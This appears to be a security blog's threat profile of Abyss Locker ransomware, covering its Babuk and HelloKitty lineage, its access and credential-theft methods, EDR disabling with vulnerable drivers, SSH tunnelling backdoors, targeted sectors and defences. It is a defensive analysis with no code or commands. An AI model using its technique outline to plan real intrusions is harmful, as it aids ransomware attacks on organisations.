Abyss Ransomware

Abyss Ransomware (also known as Abyss Locker) emerged as a significant cybersecurity threat in 2023, and its activity has continued into 2024 and early 2025. This ransomware targets both Windows and Linux systems, particularly VMware ESXi environments, and employs sophisticated double-extortion tactics. This involves not only encrypting victims' data but also exfiltrating sensitive information and threatening to release it publicly on a data leak site (DLS) if the ransom is not paid. This dual approach significantly increases the pressure on victims, making Abyss a high-severity threat. It is believed to have originated from the HelloKitty ransomware source code and shares similarities with Babuk ransomware.

Origins & Evolution

Abyss Locker first appeared in March 2023. Its codebase is reportedly derived from Babuk ransomware, a notorious group whose source code was leaked in 2021. This leak allowed various actors to develop new ransomware variants, and Abyss is one of the more sophisticated examples. Further analysis also indicates similarities in the encryption methods used by Abyss Locker and HelloKitty ransomware.

The evolution of Abyss is marked by its relatively rapid development and adoption of advanced techniques. While initially observed in early 2023, it quickly gained notoriety for its double-extortion tactics and its Linux variant capable of targeting VMware ESXi servers. This cross-platform capability expanded its potential victim pool. There have been multiple versions, the primary difference between Windows versions 1 and 2 being the ransom message (identifying as version 2) and the TOR address. The Linux version (version 1 not found) is specifically designed for VMware.

It appears to be a private operation, not a widespread Ransomware-as-a-Service (RaaS), which can make attribution and tracking more challenging for security researchers. Staying informed about the latest threat intelligence is crucial.

Tactics & Techniques

Abyss Ransomware employs a combination of sophisticated tactics, techniques, and procedures (TTPs) to maximize its impact. Its operation can be broken down into several key stages:

* Phishing Emails: Socially engineered emails containing malicious attachments or links.

* Exploitation of Vulnerabilities: Targeting unpatched systems and software, particularly in VPN appliances (e.g., SonicWall vulnerability CVE-2021-20038) and exposed servers.

* Weak SSH Configurations: Brute-forcing or exploiting weak SSH credentials, especially in Linux environments.

* Using VPN access to gain entry to the internal network.

* Targeting backup appliances (Veeam).

* Use of modified 'Veeam-Get-Creds.ps1' PowerShell script to steal credentials stored in Veeam.

* Dumping Windows SAM and Security registry hives. Learn about Windows registry structure.

* Disabling Windows Defender: Modifying registry keys to disable Windows Defender.

* EDR Agent Removal: Stopping or removing EDR agents, often using the SYSTEM account.

* BYOVD (Bring Your Own Vulnerable Driver): Using legitimate but vulnerable drivers (e.g., 'UpdateDrv.sys' from Zemana Anti-Logger, 'ped.sys' from Process Explorer, '3ware.sys') to disable security controls at the kernel level.

* Deploying AV/EDR killer executables (SophosAV.exe, auSophos.exe).

* Tunneling Tools: Uses tools like Chisel (often renamed to 'apache2') and native SSH.

* Deployment on Critical Devices: Deploys tunnels on critical network infrastructure (ESXi servers, Windows servers, VPN appliances, NAS devices) to maintain access.

* Windows SSH Tunneling Backdoor:

* Installs an OpenSSH-based tool as a persistent service ("WMI Helper Agent") via 'deploy443.ps1'.

* Uses 'WinSW-x64.exe' (renamed to 'wmihelper.exe') to masquerade as a legitimate process.

* Configuration stored in 'wmihelper.xml' (C2 IP, SSH key, port forwarding).

* ESXi SSH Tunneling:

* Compromises ESXi hosts via VPN and pivoting.

* Enables SSH if disabled and uses the native SSH binary.

* Establishes a reverse SSH tunnel to the C2 server.

* NAS Device Tunneling:

* Accesses NAS web interface (DSM) with 'admin' account.

* Enables SSH service.

* Creates a backdoor user ('support') with privileged access.

* Windows: Encrypts files and appends the ".abyss" extension (version 1 uses a random 5-letter extension).

* Linux (ESXi): Encrypts files and appends the ".crypt" extension. Specifically targets virtual machines using esxcli commands to identify and shut down running VMs.

* Uses the ChaCha encryption method.

* Windows: Drops a ransom note named "WhatHappened.txt".

* Linux: Creates ransom notes with the ".README_TO_RESTORE" extension.

Targets or Victimology

Abyss Ransomware has demonstrated a broad targeting scope, impacting organizations across various industries and geographic regions.

* Industrials (especially Manufacturing): This sector is frequently targeted, likely due to its critical role in supply chains and potential for significant disruption. See supply chain attacks for more info.

* Finance: Data is important and usually, these organizations have the funds to pay.

* Healthcare: High-value target due to sensitive patient data and the critical nature of healthcare services.

* Information Technology: Targeted for their access to client data and potential for cascading attacks through supply chains.

* Professional/Scientific/Technical Services: These organizations often possess valuable intellectual property.

* Construction

The targeting of these sectors suggests motivations beyond purely financial gain, potentially including espionage and disruption of critical infrastructure.

Attack Campaigns

Several notable attack campaigns have been attributed to Abyss Locker:

Defenses

Protecting against Abyss Ransomware requires a multi-layered approach combining preventative measures, detection capabilities, and robust incident response planning.

* Secure Edge Devices: Limit exposure of management interfaces, block unnecessary protocols, implement Geo-IP restrictions, and use firewalls with deep packet inspection.

* Network Segmentation: Utilize VLANs and firewalls to isolate critical systems and limit inter-VLAN communication.

* Strong Password Policies & MFA: Enforce strong, unique passwords and multi-factor authentication (MFA) for all user accounts, especially privileged ones.

* Credential Protection: Implement solutions like Privileged Access Management (PAM), Credential Guard (for Windows), and regularly audit registry access to prevent credential theft.

* Backup Security: Maintain regular, offline, and immutable backups with AES-256 encryption. Store backups in isolated VLANs.

* Endpoint Protection: Deploy and maintain robust endpoint detection and response (EDR) solutions. Remove or restrict the use of vulnerable drivers and enforce strict application control policies.

* Patch Management: Implement a rigorous patch management process, prioritizing known exploited vulnerabilities. Patch within 7 days or immediately for critical vulnerabilities. Conduct regular vulnerability scans.

* Security Awareness Training: Train employees to recognize and avoid phishing attempts and other social engineering tactics. Learn more types of phishing attacks.

* Access Governance: Implement Role-Based Access Control (RBAC) and MFA. Consider using authentication silos to limit the impact of compromised credentials.

* Monitor Edge Devices: Monitor for unusual SSH/SOCKS tunneling activity and suspicious DNS traffic.

* Monitor ESXi and NAS: Monitor for unauthorized SSH access, configuration changes, and attempts to tamper with logs.

* Log Forwarding: Forward logs (Sysmon on Windows, Auditd/Osquery on Linux) to a SIEM for centralized analysis. More about what is security information.

* Backup Tampering Detection: Implement alerts for any unauthorized access or modification of backup systems.

* Threat Intelligence: Stay informed about the latest TTPs and IOCs associated with Abyss Locker through threat intelligence feeds.

* Access Governance: Strictly enforce RBAC, MFA, and the principle of least privilege.

* Patch Management: Establish a formal patch management program with clear timelines and responsibilities. Consider also micropatching.

* Privileged Identity Management (PIM): Require the use of one-time passwords for privileged account access and conduct regular audits of privileged accounts.

* Incident Response Plan: Develop and test a well-defined incident response plan to handle ransomware attacks effectively.

Conclusion

Abyss Ransomware represents a significant and evolving threat in the cybersecurity landscape. Its sophisticated TTPs, including double-extortion tactics, cross-platform capabilities, and focus on critical infrastructure, make it a formidable adversary. Organizations must adopt a proactive, multi-layered defense strategy encompassing prevention, detection, and robust incident response planning to mitigate the risk posed by Abyss and similar ransomware threats. Staying informed about the latest threat intelligence and continuously adapting security measures are crucial for staying ahead of this evolving threat.

Found this article interesting? Keep visit thesecmaster.com, and our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium, and Instagram and subscribe to receive tips like this. 

You may also like these articles: